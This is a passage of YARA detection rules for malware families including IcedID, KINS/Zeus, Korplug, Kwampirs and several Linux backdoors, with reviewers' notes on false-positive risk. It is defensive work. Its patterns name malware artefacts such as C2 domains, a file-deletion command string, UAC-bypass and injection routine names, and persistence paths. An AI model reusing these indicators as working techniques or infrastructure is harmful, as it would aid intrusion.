        $L4_FILEAGENTVer = { C7 ?? 46 49 4C 45 C7 ?? 04 41 47 45 4E }
        $L4_TMP0M34JDF8 = { C7 ?? ?? ?? ?? ?? 54 4D 50 30 C7 ?? ?? ?? ?? ?? 4D 33 34 4A }
        $L4_tmpmdworker = { C7 ?? 2F 74 6D 70 C7 ?? 04 2F 2E 6D 64 }
    condition:
        any of ($L4*)
}

// Any single string matches. Most are sample-specific (CGI endpoints,
// build paths), but "/tmp/Spotlight" is generic-looking -- NOTE(review):
// consider whether it should count on its own.
rule IMulerStrings : IMuler Family {
    meta:
        description = "IMuler Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-16"
    strings:
        $ = "/cgi-mac/"
        $ = "xnocz1"
        $ = "checkvir.plist"
        $ = "/Users/apple/Documents/mac back"
        $ = "iMuler2"
        $ = "/Users/imac/Desktop/macback/"
        $ = "xntaskz.gz"
        $ = "2wmsetstatus.cgi"
        $ = "launch-0rp.dat"
        $ = "2wmupload.cgi"
        $ = "xntmpz"
        $ = "2wmrecvdata.cgi"
        $ = "xnorz6"
        $ = "2wmdelfile.cgi"
        $ = "/LanchAgents/checkvir"
        $ = "0PERA:%s"
        $ = "/tmp/Spotlight"
        $ = "/tmp/launch-ICS000"
    condition:
        any of them
}

rule IMuler : Family {
    meta:
        description = "IMuler"
        author = "Seth Hardy"
        last_modified = "2014-06-16"
    condition:
        // Either the code tricks or the identifying strings suffice.
        IMulerCode or IMulerStrings
}

/* Yara rule to detect IcedID banking trojan generic This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// IcedID: MZ header at offset 0, one entry-stub byte pattern, six of the
// eight runtime-name strings, a fixed four-section layout, and two PE
// characteristic flags. The $st0* names are MFC/CRT class and RTTI names
// that presumably also appear in benign MFC builds; the section layout and
// RELOCS_STRIPPED requirement are what narrow the match.
rule IceID_Bank_trojan {
    meta:
        description = "Detects IcedID..adjusted several times"
        author = "unixfreaxjp"
        org = "MalwareMustDie"
        date = "2018-01-14"
    strings:
        $header = { 4D 5A }
        $magic1 = { E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 68 ?? ?? }
        $st01 = "CCmdTarget" fullword nocase wide ascii
        $st02 = "CUserException" fullword nocase wide ascii
        $st03 = "FileType" fullword nocase wide ascii
        $st04 = "FlsGetValue" fullword nocase wide ascii
        $st05 = "AVCShellWrapper@@" fullword nocase wide ascii
        $st06 = "AVCCmdTarget@@" fullword nocase wide ascii
        $st07 = "AUCThreadData@@" fullword nocase wide ascii
        $st08 = "AVCUserException@@" fullword nocase wide ascii
    condition:
        // `$st0*` covers $st01..$st08. pe.sections[3] is undefined on a PE
        // with fewer than four sections, which makes the whole condition false.
        $header at 0 and all of ($magic*) and 6 of ($st0*)
        and pe.sections[0].name contains ".text"
        and pe.sections[1].name contains ".rdata"
        and pe.sections[2].name contains ".data"
        and pe.sections[3].name contains ".rsrc"
        and pe.characteristics & pe.EXECUTABLE_IMAGE
        and pe.characteristics & pe.RELOCS_STRIPPED
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// iexpl0re family (Seth Hardy): code patterns and strings, combined below.
rule iexpl0reCode : iexpl0ree Family {
    meta:
        description = "iexpl0re code features"
        author = "Seth Hardy"
        last_modified = "2014-07-21"
    strings:
        // Any one pattern matches.
        $ = { 47 83 FF 64 0F 8C 6D FF FF FF 33 C0 5F 5E 5B C9 C3 }
        $ = { 80 74 0D A4 44 41 3B C8 7C F6 68 04 01 00 00 }
        $ = { 8A C1 B2 07 F6 EA 30 04 31 41 3B 4D 10 7C F1 }
        $ = { 47 83 FF 64 0F 8C 79 FF FF FF 33 C0 5F 5E 5B C9 C3 }
        // 88h decrypt
        $ = { 68 88 00 00 00 68 90 06 00 00 68 ?? ?? ?? ?? 89 3? E8 }
        $ = { BB 88 00 00 00 53 68 90 06 00 00 68 ?? ?? ?? ?? 89 3? E8 }
    condition:
        any of them
}

// NOTE(review): `any of them` lets "LoaderV5.dll" match on its own; that
// file name is less specific than the other strings -- confirm it is not
// shared with unrelated software before relying on it alone.
rule iexpl0reStrings : iexpl0re Family {
    meta:
        description = "Strings used by iexpl0re"
        author = "Seth Hardy"
        last_modified = "2014-07-21"
    strings:
        // Drop/persistence paths (note the zero in IEXPL0RE).
        $ = "%USERPROFILE%\\IEXPL0RE.EXE"
        $ = "\"<770j (("
        $ = "\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\IEXPL0RE.LNK"
        $ = "\\Documents and Settings\\%s\\Application Data\\Microsoft\\Internet Explorer\\IEXPL0RE.EXE"
        $ = "LoaderV5.dll"
        // stage 2
        $ = "POST /index%0.9d.asp HTTP/1.1"
        $ = "GET /search?n=%0.9d&"
        $ = "DUDE_AM_I_SHARP-3.14159265358979x6.626176"
        $ = "WHO_A_R_E_YOU?2.99792458x1.25663706143592"
        $ = "BASTARD_&&_BITCHES_%0.8x"
        $ = "c:\\bbb\\eee.txt"
    condition:
        any of them
}

rule iexpl0re : Family {
    meta:
        description = "iexpl0re family"
        author = "Seth Hardy"
        last_modified = "2014-07-21"
    condition:
        iexpl0reCode or iexpl0reStrings
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// Insta11 family (Seth Hardy): a single code pattern and a string set.
rule Insta11Code : Insta11 Family {
    meta:
        description = "Insta11 code features"
        author = "Seth Hardy"
        last_modified = "2014-06-23"
    strings:
        // jmp $+5; push 423h
        $jumpandpush = { E9 00 00 00 00 68 23 04 00 00 }
    condition:
        any of them
}

// NOTE(review): the two GUID strings look like COM/interface identifiers
// that could also be present in benign binaries; with `any of them` each
// is sufficient alone -- confirm their specificity.
rule Insta11Strings : Insta11 Family {
    meta:
        description = "Insta11 Identifying Strings"
        author = "Seth Hardy"
        last_modified = "2014-06-23"
    strings:
        $ = "XTALKER7"
        $ = "Insta11 Microsoft" wide ascii
        $ = "wudMessage"
        $ = "ECD4FC4D-521C-11D0-B792-00A0C90312E1"
        $ = "B12AE898-D056-4378-A844-6D393FE37956"
    condition:
        any of them
}

rule Insta11 : Family {
    meta:
        description = "Insta11"
        author = "Seth Hardy"
        last_modified = "2014-06-23"
    condition:
        Insta11Code or Insta11Strings
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// DLL side-loading pair: the executable that resolves a set of names from a
// companion DLL, and the planted DLL itself. The hex strings are plain ASCII.
rule Intel_Virtualization_Wizard_exe {
    meta:
        author = "cabrel@zerklabs.com"
        description = "Dynamic DLL abuse executable"
        file_1_seen = "2013-05-21"
        file_1_sha256 = "7787757ae851f4a162f46f794be1532ab78e1928185212bdab83b3106f28c708"
    strings:
        $a = {4C 6F 61 64 53 54 52 49 4E 47}                                     // "LoadSTRING"
        $b = {49 6E 69 74 69 61 6C 69 7A 65 4B 65 79 48 6F 6F 6B}                // "InitializeKeyHook"
        $c = {46 69 6E 64 52 65 73 6F 75 72 63 65 73}                            // "FindResources"
        $d = {4C 6F 61 64 53 54 52 49 4E 47 46 72 6F 6D 48 4B 43 55}             // "LoadSTRINGFromHKCU"
        $e = {68 63 63 75 74 69 6C 73 2E 44 4C 4C}                               // "hccutils.DLL"
    condition:
        all of them
}

// The malicious DLL is only reported when the same object also satisfies
// the _exe rule above, i.e. it must export the same name set.
rule Intel_Virtualization_Wizard_dll {
    meta:
        author = "cabrel@zerklabs.com"
        description = "Dynamic DLL (Malicious)"
        file_1_seen = "2013-05-21"
        file_1_sha256 = "485ae043b6a5758789f1d33766a26d8b45b9fde09cde0512aa32d4bd1ee04f28"
    strings:
        // Build-path and PDB artefacts: "H:\Fast\Plug(hkcmd)\" and "dll\Release\HijackDll.pdb".
        $a = {48 3A 5C 46 61 73 74 5C 50 6C 75 67 28 68 6B 63 6D 64 29 5C}
        $b = {64 6C 6C 5C 52 65 6C 65 61 73 65 5C 48 69 6A 61 63 6B 44 6C 6C 2E 70 64 62}
    condition:
        ($a and $b) and Intel_Virtualization_Wizard_exe
}

rule IotReaper: MALW {
    meta:
        description = "Linux.IotReaper"
        author = "Joan Soriano / @w0lfvan"
        date = "2017-10-30"
        version = "1.0"
        MD5 = "95b448bdf6b6c97a33e1d1dbe41678eb"
        SHA256 = "b463ca6c3ec7fa19cd318afdd2fa2365fa9e947771c21c4bd6a3bc2120ba7f28"
    strings:
        // C2 domain, a cleanup command (note the trailing space before \n)
        // and a MAC-address format string; all required.
        $a = "weruuoqweiur.com"
        $b = "rm -f /tmp/ftpupload.sh \n"
        $c = "%02x-%02x-%02x-%02x-%02x-%02x"
    condition:
        all of them
}

// Event-log indicator rule (reed1713): the strings are Windows event
// provider names, event ids and message fragments, so the rule presumably
// targets exported log data rather than executables.
// NOTE(review): several strings are exact duplicates ($type/$type1,
// $type2/$type3, $data3/$data4, $data5/$data7) -- harmless under
// `all of them` but redundant -- and the short tokens "4673", "Security",
// "running" co-occur easily in large inputs such as memory images, so hits
// there are low-confidence.
rule Backdoor_Jolob {
    meta:
        maltype = "Backdoor.Jolob"
        ref = "https://github.com/reed1713"
        reference = "http://www.symantec.com/connect/blogs/new-flash-zero-day-linked-yet-more-watering-hole-attacks"
        description = "the backdoor registers an auto start service with the display name \"Network Access Management Agent\" pointing to the dll netfilter.dll. This is accomplished without notifying the user via the sysprep UAC bypass method."
    strings:
        // Security log: privileged call (4673) and process creation (4688) involving sysprep.exe.
        $type = "Microsoft-Windows-Security-Auditing"
        $eventid = "4673"
        $data1 = "Security"
        $data2 = "SeCreateGlobalPrivilege"
        $data3 = "Windows\\System32\\sysprep\\sysprep.exe" nocase
        $type1 = "Microsoft-Windows-Security-Auditing"
        $eventid1 = "4688"
        $data4 = "Windows\\System32\\sysprep\\sysprep.exe" nocase
        // System log: service state change (7036) and service installation (7045).
        $type2 = "Service Control Manager"
        $eventid2 = "7036"
        $data5 = "Network Access Management Agent"
        $data6 = "running"
        $type3 = "Service Control Manager"
        $eventid3 = "7045"
        $data7 = "Network Access Management Agent"
        $data8 = "user mode service"
        $data9 = "auto start"
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

// KINS dropper (AlienVault): requires two strings from each of the three
// groups (protocol, injection, UAC-related artefacts).
rule KINS_dropper : dropper {
    meta:
        author = "AlienVault Labs aortega@alienvault.com"
        description = "Match protocol, process injects and windows exploit present in KINS dropper"
        reference = "http://goo.gl/arPhm3"
    strings:
        // Network protocol
        $n1 = "tid=%d&ta=%s-%x" fullword
        $n2 = "fid=%d" fullword
        $n3 = "%[^.].%[^(](%[^)])" fullword    // scanf-style parse template
        // Injects
        $i0 = "%s [%s %d] 77 %s"
        $i01 = "Global\\%s%x"
        $i1 = "Inject::InjectProcessByName()"
        $i2 = "Inject::CopyImageToProcess()"
        $i3 = "Inject::InjectProcess()"
        $i4 = "Inject::InjectImageToProcess()"
        $i5 = "Drop::InjectStartThread()"
        // UAC bypass
        $uac1 = "ExploitMS10_092"
        $uac2 = "\\globalroot\\systemroot\\system32\\tasks\\" ascii wide
        $uac3 = "<RunLevel>HighestAvailable</RunLevel>" ascii wide
    condition:
        2 of ($n*) and 2 of ($i*) and 2 of ($uac*)
}

// Zeus-derived bot bundled with the leaked KINS dropper: all four protocol
// markers (three literals plus the regex) and at least one encrypted-string
// sample. The $s* values are raw bytes written with \x escapes.
rule KINS_DLL_zeus {
    meta:
        author = "AlienVault Labs aortega@alienvault.com"
        description = "Match default bot in KINS leaked dropper, Zeus"
        reference = "http://goo.gl/arPhm3"
    strings:
        // Network protocol
        $n1 = "%BOTID%" fullword
        $n2 = "%opensocks%" fullword
        $n3 = "%openvnc%" fullword
        $n4 = /Global\\(s|v)_ev/ fullword
        // Crypted strings
        $s1 = "\x72\x6E\x6D\x2C\x36\x7D\x76\x77"
        $s2 = "\x18\x04\x0F\x12\x16\x0A\x1E\x08\x5B\x11\x0F\x13"
        $s3 = "\x39\x1F\x01\x07\x15\x19\x1A\x33\x19\x0D\x1F"
        $s4 = "\x62\x6F\x71\x78\x63\x61\x7F\x69\x2D\x67\x79\x65"
        $s5 = "\x6F\x69\x7F\x6B\x61\x53\x6A\x7C\x73\x6F\x71"
    condition:
        all of ($n*) and 1 of ($s*)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// Korlia/Bisonal: three single-byte XOR string-decoding loops (the key byte
// is wildcarded in $a, $b and $c) plus a config marker. Any one matches.
// The disassembly listings below are the author's and document each pattern.
rule korlia {
    meta:
        author = "Nick Hoffman"
        company = "Morphick"
        reference = "http://www.morphick.com/resources/lab-blog/curious-korlia"
        information = "korlia malware found in apt dump"
        //case a
        //b2 1f mov dl, 0x1f ; mov key (wildcard)
        // -----------------
        //8A 86 98 40 00 71 mov al, byte ptr url[esi]
        //BF 98 40 00 71 mov edi, offset url
        //32 C2 xor al, dl
        //83 C9 FF or ecx, 0FFFFFFFFh
        //88 86 98 40 00 71 mov byte ptr url[esi], al
        //33 C0 xor eax, eax
        //46 inc esi
        //F2 AE repne scasb
        //F7 D1 not ecx
        //49 dec ecx
        //3B F1 cmp esi, ecx
        //72 DE jb short loc_71001DE0
        //case b (variant of loop a)
        //8A 8A 28 50 40 00 mov cl, byte_405028[edx]
        //BF 28 50 40 00 mov edi, offset byte_405028
        //32 CB xor cl, bl
        //33 C0 xor eax, eax
        //88 8A 28 50 40 00 mov byte_405028[edx], cl
        //83 C9 FF or ecx, 0FFFFFFFFh
        //42 inc edx
        //F2 AE repne scasb
        //F7 D1 not ecx
        //49 dec ecx
        //3B D1 cmp edx, ecx
        //72 DE jb short loc_4047F2
        //case c (not a variant of the above loop)
        //8A 0C 28 mov cl, [eax+ebp]
        //80 F1 28 xor cl, 28h
        //88 0C 28 mov [eax+ebp], cl
        //8B 4C 24 14 mov ecx, [esp+0D78h+var_D64]
        //40 inc eax
        //3B C1 cmp eax, ecx
        //7C EE jl short loc_404F1C
    strings:
        // The trailing conditional jump is left out of $a and $b since its
        // displacement varies between builds.
        $a = {b2 ?? 8A 86 98 40 00 71 BF 98 40 00 71 32 c2 83 C9 FF 88 86 98 40 00 71 33 C0 46 F2 AE F7 D1 49 3B F1}
        $b = {B3 ?? ?? ?? 8A 8A 28 50 40 00 BF 28 50 40 00 32 CB 33 C0 88 8A 28 50 40 00 83 C9 FF 42 F2 AE F7 D1 49 3B D1}
        $c = {8A 0C 28 80 F1 ?? 88 0C 28 8B 4C 24 14 40 3B C1}
        $d = {00 62 69 73 6F 6E 61 6C 00} //config marker "\x00bisonal\x00"
    condition:
        any of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// Korplug/PlugX "FAST" variant: PE gate (MZ, < 500KB) plus either the full
// rundll32 launch string, the ShadowPlay export name with one support
// string, or four of the support strings.
rule Korplug_FAST {
    meta:
        description = "Rule to detect Korplug/PlugX FAST variant"
        author = "Florian Roth"
        date = "2015-08-20"
        hash = "c437465db42268332543fbf6fd6a560ca010f19e0fd56562fb83fb704824b371"
    strings:
        $x1 = "%s\\rundll32.exe \"%s\", ShadowPlay" fullword ascii
        $a1 = "ShadowPlay" fullword ascii
        $s1 = "%s\\rundll32.exe \"%s\"," fullword ascii
        // Side-loaded DLL and payload file names used by this variant.
        $s2 = "nvdisps.dll" fullword ascii
        $s3 = "%snvdisps.dll" fullword ascii
        $s4 = "\\winhlp32.exe" fullword ascii
        $s5 = "nvdisps_user.dat" fullword ascii
        $s6 = "%snvdisps_user.dat" fullword ascii
    condition:
        uint16(0) == 0x5a4d and filesize < 500KB and ( $x1 or ($a1 and 1 of ($s*)) or 4 of ($s*) )
}

// Event-log indicator rule (reed1713): process-creation events (4688) for
// three executables under ProgramData\RasTls. The strings are event-log
// field values, so the rule presumably targets exported log data; the
// three $type*/$eventid* pairs are identical and redundant under `all of them`.
rule Korplug {
    meta:
        maltype = "Korplug Backdoor"
        author = "https://github.com/reed1713"
        reference = "http://www.symantec.com/connect/blogs/new-sample-backdoorkorplug-signed-stolen-certificate"
        description = "IOC looks for events associated with the KORPLUG Backdoor linked to the recent operation greedy wonk activity."
    strings:
        $type = "Microsoft-Windows-Security-Auditing"
        $eventid = "4688"
        $data = "ProgramData\\RasTls\\RasTls.exe"
        $type1 = "Microsoft-Windows-Security-Auditing"
        $eventid1 = "4688"
        $data1 = "ProgramData\\RasTls\\rundll32.exe"
        $type2 = "Microsoft-Windows-Security-Auditing"
        $eventid2 = "4688"
        $data2 = "ProgramData\\RasTls\\svchost.exe"
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// Kovter event-log indicator rule: a regsvr32.exe process-creation event
// (4688) together with process-exit events (4689) for mshta.exe,
// powershell.exe and WmiPrvSE.exe. All strings are `wide ascii` so they
// match both UTF-16 EVTX content and plain-text exports.
// NOTE(review): $type..$type3 are one identical string and
// $eventid1..$eventid3 another; the duplicates are harmless under
// `all of them` but redundant. The four system binaries are common, so on
// large inputs such as memory images this rule presumably fires on
// ordinary log content -- treat as low-confidence there.
rule Kovter {
    meta:
        maltype = "Kovter"
        reference = "http://blog.airbuscybersecurity.com/post/2016/03/FILELESS-MALWARE-%E2%80%93-A-BEHAVIOURAL-ANALYSIS-OF-KOVTER-PERSISTENCE"
        date = "9-19-2016"
        description = "fileless malware"
    strings:
        $type = "Microsoft-Windows-Security-Auditing" wide ascii
        $eventid = "4688" wide ascii
        $data = "Windows\\System32\\regsvr32.exe" wide ascii
        $type1 = "Microsoft-Windows-Security-Auditing" wide ascii
        $eventid1 = "4689" wide ascii
        $data1 = "Windows\\System32\\mshta.exe" wide ascii
        $type2 = "Microsoft-Windows-Security-Auditing" wide ascii
        $eventid2 = "4689" wide ascii
        $data2 = "Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" wide ascii
        $type3 = "Microsoft-Windows-Security-Auditing" wide ascii
        $eventid3 = "4689" wide ascii
        $data3 = "Windows\\System32\\wbem\\WmiPrvSE.exe" wide ascii
    condition:
        all of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// Kraken bot: MZ gate plus all five strings (two of them base64 fragments
// of environment-variable names, as the author's comments note).
rule Kraken_Bot_Sample : bot {
    meta:
        description = "Kraken Bot Sample - file inf.bin"
        author = "Florian Roth"
        reference = "https://blog.gdatasoftware.com/blog/article/dissecting-the-kraken.html"
        date = "2015-05-07"
        hash = "798e9f43fc199269a3ec68980eb4d91eb195436d"
        score = 90
    strings:
        $s2 = "%s=?getname" fullword ascii
        $s4 = "&COMPUTER=^" fullword ascii
        $s5 = "xJWFwcGRhdGElAA=" fullword ascii /* base64 encoded string '%appdata%' */
        $s8 = "JVdJTkRJUi" fullword ascii /* base64 encoded string '%WINDIR' */
        $s20 = "btcplug" fullword ascii
    condition:
        uint16(0) == 0x5a4d and all of them
}

// Kwampirs (Orangeworm, Symantec): any two of an embedded RSA public key,
// the network XOR key table, and two code sequences. Matching on the
// operator's public key and key table ties the hit to this campaign's
// infrastructure rather than to generic code.
rule Kwampirs {
    meta:
        copyright = "Symantec"
        reference = "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
        family = "Kwampirs"
        description = "Kwampirs dropper and main payload components"
    strings:
        // Leading bytes look like a CryptoAPI PUBLICKEYBLOB header: type 06,
        // version 02, algorithm id A4 00 (RSA key exchange), "RSA1" magic
        // (52 53 41 31), 2048-bit length (00 08 00 00) and exponent 65537
        // (01 00 01 00), followed by the 256-byte modulus -- confirm against the sample.
        $pubkey = { 06 02 00 00 00 A4 00 00 52 53 41 31 00 08 00 00 01 00 01 00 CD 74 15 BC 47 7E 0A 5E E4 35 22 A5 97 0C 65 BE E0 33 22 F2 94 9D F5 40 97 3C 53 F9 E4 7E DD 67 CF 5F 0A 5E F4 AD C9 CF 27 D3 E6 31 48 B8 00 32 1D BE 87 10 89 DA 8B 2F 21 B4 5D 0A CD 43 D7 B4 75 C9 19 FE CC 88 4A 7B E9 1D 8C 11 56 A6 A7 21 D8 C6 82 94 C1 66 11 08 E6 99 2C 33 02 E2 3A 50 EA 58 D2 A7 36 EE 5A D6 8F 5D 5D D2 9E 04 24 4A CE 4C B6 91 C0 7A C9 5C E7 5F 51 28 4C 72 E1 60 AB 76 73 30 66 18 BE EC F3 99 5E 4B 4F 59 F5 56 AD 65 75 2B 8F 14 0C 0D 27 97 12 71 6B 49 08 84 61 1D 03 BA A5 42 92 F9 13 33 57 D9 59 B3 E4 05 F9 12 23 08 B3 50 9A DA 6E 79 02 36 EE CE 6D F3 7F 8B C9 BE 6A 7E BE 8F 85 B8 AA 82 C6 1E 14 C6 1A 28 29 59 C2 22 71 44 52 05 E5 E6 FE 58 80 6E D4 95 2D 57 CB 99 34 61 E9 E9 B3 3D 90 DC 6C 26 5D 70 B4 78 F9 5E C9 7D 59 10 61 DF F7 E4 0C B3 }
        // 256-byte key table used for the network encoding (per the string name).
        $network_xor_key = { B7 E9 F9 2D F8 3E 18 57 B9 18 2B 1F 5F D9 A5 38 C8 E7 67 E9 C6 62 9C 50 4E 8D 00 A6 59 F8 72 E0 91 42 FF 18 A6 D1 81 F2 2B C8 29 EB B9 87 6F 58 C2 C9 8E 75 3F 71 ED 07 D0 AC CE 28 A1 E7 B5 68 CD CF F1 D8 2B 26 5C 31 1E BC 52 7C 23 6C 3E 6B 8A 24 61 0A 17 6C E2 BB 1D 11 3B 79 E0 29 75 02 D9 25 31 5F 95 E7 28 28 26 2B 31 EC 4D B3 49 D9 62 F0 3E D4 89 E4 CC F8 02 41 CC 25 15 6E 63 1B 10 3B 60 32 1C 0D 5B FA 52 DA 39 DF D1 42 1E 3E BD BC 17 A5 96 D9 43 73 3C 09 7F D2 C6 D4 29 83 3E 44 44 6C 97 85 9E 7B F0 EE 32 C3 11 41 A3 6B A9 27 F4 A3 FB 2B 27 2B B6 A6 AF 6B 39 63 2D 91 75 AE 83 2E 1E F8 5F B5 65 ED B3 40 EA 2A 36 2C A6 CF 8E 4A 4A 3E 10 6C 9D 28 49 66 35 83 30 E7 45 0E 05 ED 69 8D CF C5 40 50 B1 AA 13 74 33 0F DF 41 82 3B 1A 79 DC 3B 9D C3 BD EA B1 3E 04 33 }
        // String-decryption routine (contains a fixed call displacement, so it is build-specific).
        $decrypt_string = { 85 DB 75 09 85 F6 74 05 89 1E B0 01 C3 85 FF 74 4F F6 C3 01 75 4A 85 F6 74 46 8B C3 D1 E8 33 C9 40 BA 02 00 00 00 F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 12 28 00 00 89 06 8B C8 83 C4 04 33 C0 85 DB 74 16 8B D0 83 E2 0F 8A 92 1C 33 02 10 32 14 38 40 88 11 41 3B C3 72 EA 66 C7 01 00 00 B0 01 C3 32 C0 C3 }
        // String-table initialisation routine; contains absolute addresses (xx 35 02 10), so it is build-specific.
        $init_strings = { 55 8B EC 83 EC 10 33 C9 B8 0D 00 00 00 BA 02 00 00 00 F7 E2 0F 90 C1 53 56 57 F7 D9 0B C8 51 E8 B3 27 00 00 BF 05 00 00 00 8D 77 FE BB 4A 35 02 10 2B DE 89 5D F4 BA 48 35 02 10 4A BB 4C 35 02 10 83 C4 04 2B DF A3 C8 FC 03 10 C7 45 FC 00 00 00 00 8D 4F FC 89 55 F8 89 5D F0 EB 06 }
    condition:
        2 of them
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

import "pe"

// LURK0 / CCTV0 (Katie Kleemola): each family has a header-marker rule
// (the 5-byte protocol tag built one character at a time) that is combined
// with a shared string rule in the public LURK0 and CCTV0 rules below.
rule LURK0Header : Family LURK0 {
    meta:
        description = "5 char code for LURK0"
        author = "Katie Kleemola"
        last_updated = "07-21-2014"
    strings:
        // Five `mov byte [..], imm8` stores whose immediates spell "LURK0" (4C 55 52 4B 30).
        $ = { C6 [5] 4C C6 [5] 55 C6 [5] 52 C6 [5] 4B C6 [5] 30 }
    condition:
        any of them
}

// NOTE(review): the description says "LURK0" but the immediates here spell
// "CCTV0" (43 43 54 56 30); the meta text looks copy-pasted from LURK0Header.
rule CCTV0Header : Family CCTV0 {
    meta:
        description = "5 char code for LURK0"
        author = "Katie Kleemola"
        last_updated = "07-21-2014"
    strings:
        //if its just one char a time
        $ = { C6 [5] 43 C6 [5] 43 C6 [5] 54 C6 [5] 56 C6 [5] 30 }
        // bit hacky but for when samples dont just simply mov 1 char at a time
        $ = { B0 43 88 [3] 88 [3] C6 [3] 54 C6 [3] 56 [0-12] (B0 30 | C6 [3] 30) }
    condition:
        any of them
}

// Any single string matches. The author's own "todo: finetune" stands:
// NOTE(review): very short wide strings such as $m2 ("111" framed by NULs)
// and $m4 ("ER") are weak atoms that can match unrelated UTF-16 data.
rule SharedStrings : Family {
    meta:
        description = "Internal names found in LURK0/CCTV0 samples"
        author = "Katie Kleemola"
        last_updated = "07-22-2014"
    strings:
        // internal names
        $i1 = "Butterfly.dll"
        $i2 = /\\BT[0-9.]+\\ButterFlyDLL\\/
        $i3 = "ETClientDLL"
        // dbx
        $d1 = "\\DbxUpdateET\\" wide
        $d2 = "\\DbxUpdateBT\\" wide
        $d3 = "\\DbxUpdate\\" wide
        // other folders
        $mc1 = "\\Micet\\"
        // embedded file names
        $n1 = "IconCacheEt.dat" wide
        $n2 = "IconConfigEt.dat" wide
        $m1 = "\x00\x00ERXXXXXXX\x00\x00" wide
        $m2 = "\x00\x00111\x00\x00" wide
        $m3 = "\x00\x00ETUN\x00\x00" wide
        $m4 = "\x00\x00ER\x00\x00" wide
    condition:
        any of them //todo: finetune this
}

rule LURK0 : Family LURK0 {
    meta:
        description = "rule for lurk0"
        author = "Katie Kleemola"
        last_updated = "07-22-2014"
    condition:
        LURK0Header and SharedStrings
}

rule CCTV0 : Family CCTV0 {
    meta:
        description = "rule for cctv0"
        author = "Katie Kleemola"
        last_updated = "07-22-2014"
    condition:
        CCTV0Header and SharedStrings
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
*/

// Methodology rule over Windows event-log content: a process-creation
// event (4688) naming PsExec.exe, net.exe or at.exe. Each of the three
// (provider, event id, image) triples is sufficient on its own.
// NOTE(review): the strings are event-log field values, so this presumably
// targets exported log data; "4688" and "Microsoft-Windows-Security-Auditing"
// occur in any Security log and net.exe/at.exe are legitimate tools, so on
// large inputs such as memory images expect this to fire on benign
// activity -- it is a lead to review, not a detection.
rule lateral_movement {
    meta:
        date = "3/12/2014"
        author = "https://github.com/reed1713"
        description = "methodology sig looking for signs of lateral movement"
    strings:
        $type = "Microsoft-Windows-Security-Auditing"
        $eventid = "4688"
        $data = "PsExec.exe"
        $type1 = "Microsoft-Windows-Security-Auditing"
        $eventid1 = "4688"
        $data1 = "Windows\\System32\\net.exe"
        $type2 = "Microsoft-Windows-Security-Auditing"
        $eventid2 = "4688"
        $data2 = "Windows\\System32\\at.exe"
    condition:
        ($type and $eventid and $data) or ($type1 and $eventid1 and $data1) or ($type2 and $eventid2 and $data2)
}

/* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */

import "pe"

/* LENOVO Superfish -------------------------------------------------------- */

// Superfish VisualDiscovery SSL interceptor: MZ at offset 0, under 2MB, and
// all active $s* strings. $s1 is commented out, so `all of ($s*)` covers
// $s2..$s5 only.
// NOTE(review): the rule identifier misspells Lenovo as "Lonovo"; it is
// kept as-is because renaming would break any external reference to it.
rule VisualDiscovery_Lonovo_Superfish_SSL_Hijack {
    meta:
        description = "Lenovo Superfish SSL Interceptor - file VisualDiscovery.exe"
        author = "Florian Roth / improved by kbandla"
        reference = "https://twitter.com/4nc4p/status/568325493558272000"
        date = "2015/02/19"
        hash1 = "99af9cfc7ab47f847103b5497b746407dc566963"
        hash2 = "f0b0cd0227ba302ac9ab4f30d837422c7ae66c46"
        hash3 = "f12edf2598d8f0732009c5cd1df5d2c559455a0b"
        hash4 = "343af97d47582c8150d63cbced601113b14fcca6"
    strings:
        $mz = { 4d 5a }
        //$s1 = "VisualDiscovery.exe" fullword wide
        $s2 = "Invalid key length used to initialize BlowFish." fullword ascii
        $s3 = "GetPCProxyHandler" fullword ascii
        $s4 = "StartPCProxy" fullword ascii
        $s5 = "SetPCProxyHandler" fullword ascii
    condition:
        ( $mz at 0 ) and filesize < 2MB and all of ($s*)
}

rule LinuxBew: MALW {
    meta:
        description = "Linux.Bew Backdoor"
        author = "Joan Soriano / @w0lfvan"
        date = "2017-07-10"
        version = "1.0"
        MD5 = "27d857e12b9be5d43f935b8cc86eaabf"
        SHA256 = "80c4d1a1ef433ac44c4fe72e6ca42395261fbca36eff243b07438263a1b1cf06"
    strings:
        // Embedded source path, C2 host and a temp-file name; all required.
        $a = "src/secp256k1.c"
        $b = "hfir.u230.org"
        $c = "tempfile-x11session"
    condition:
        all of them
}

rule LinuxHelios: MALW {
    meta:
        description = "Linux.Helios"
